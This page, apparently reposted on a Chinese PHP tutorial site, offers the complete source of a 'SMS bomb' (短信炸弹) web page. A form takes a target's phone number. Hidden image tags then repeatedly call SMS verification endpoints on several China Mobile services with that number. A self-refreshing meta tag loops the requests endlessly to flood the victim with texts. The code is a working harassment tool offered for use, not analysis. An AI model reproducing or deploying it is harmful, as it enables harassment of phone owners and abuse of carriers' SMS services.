Home  >  Article  >  php教程  >  PHP短信*

PHP短信*

PHP中文网
PHP中文网Original
2016-06-01 14:32:361519browse

PHP短信炸弹 

<!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" 
"http://www.wapforum.org/DTD/xhtml-mobile10.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html;charset=UTF-8"/>
<meta http-equiv="Cache-Control" content="max-age=0" forua="true"/>
<meta http-equiv="Cache-Control" content="no-cache"/>
<meta http-equiv="Expires" content="0"/>
<link rel="stylesheet" href="http://tuvvv.com/tuvvv.css?1.1.6" type="text/css"/>
<title>短信炸弹</title>
</head>
<body>
<p class="title"><a href="/">首页</a>>移动短信炸弹</p>
<p class="nav"><p class="tip">请填写要炸的手机号码(此炸弹只有移动号才能用,是免费的,但手机必须要开启图片显示)
</p></p>
<p class="title">
--=手机号码=--</p>
<p class="nav">
<form method=&#39;GET&#39; action=&#39;index.php&#39;>
<input name=&#39;hm&#39; value=&#39;&#39; size=&#39;15&#39; maxlength=&#39;10000&#39;/><input type="hidden" name="c" value="1"/>
<br/><input type=&#39;submit&#39; name=&#39;ok&#39; value=&#39;[开始狂炸]&#39;/>
</form>
<?php
error_reporting(0);
$v=$_GET[&#39;c&#39;];
$a=$v+1;
$e=$a-1;
$d=$_GET[&#39;hm&#39;];
?>
<p class="tip"><?php
if($d>1){
    echo"<br/>OK,成功轰炸$d,第$e.次";
    echo "<img src=&#39;http://gd.12530.com/user/getvalidcode2.do?phonenumber=$d&#39; alt=&#39;&#39;/>
    <img src=&#39;http://mm.10086.cn/portal/web/SmsRandomSendAction.do?msisdn=$d&#39; alt=&#39;&#39;/>
    
    <img src=&#39;http://www.gd.chinamobile.com/login/sendSMSRND.jsp?_logonName=$d&#39; alt=&#39;&#39;/>";
     echo"<meta http-equiv=refresh content=&#39;0; url=dxzd.php?hm=$d&amp;c=$a&#39;>";
}else{
echo"<br/>请输入手机号码!";
}
?>
</p>
</p>
 
</body>
</html>


 以上就是PHP短信炸弹 的内容,更多相关内容请关注PHP中文网(www.php.cn)!


Statement:
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn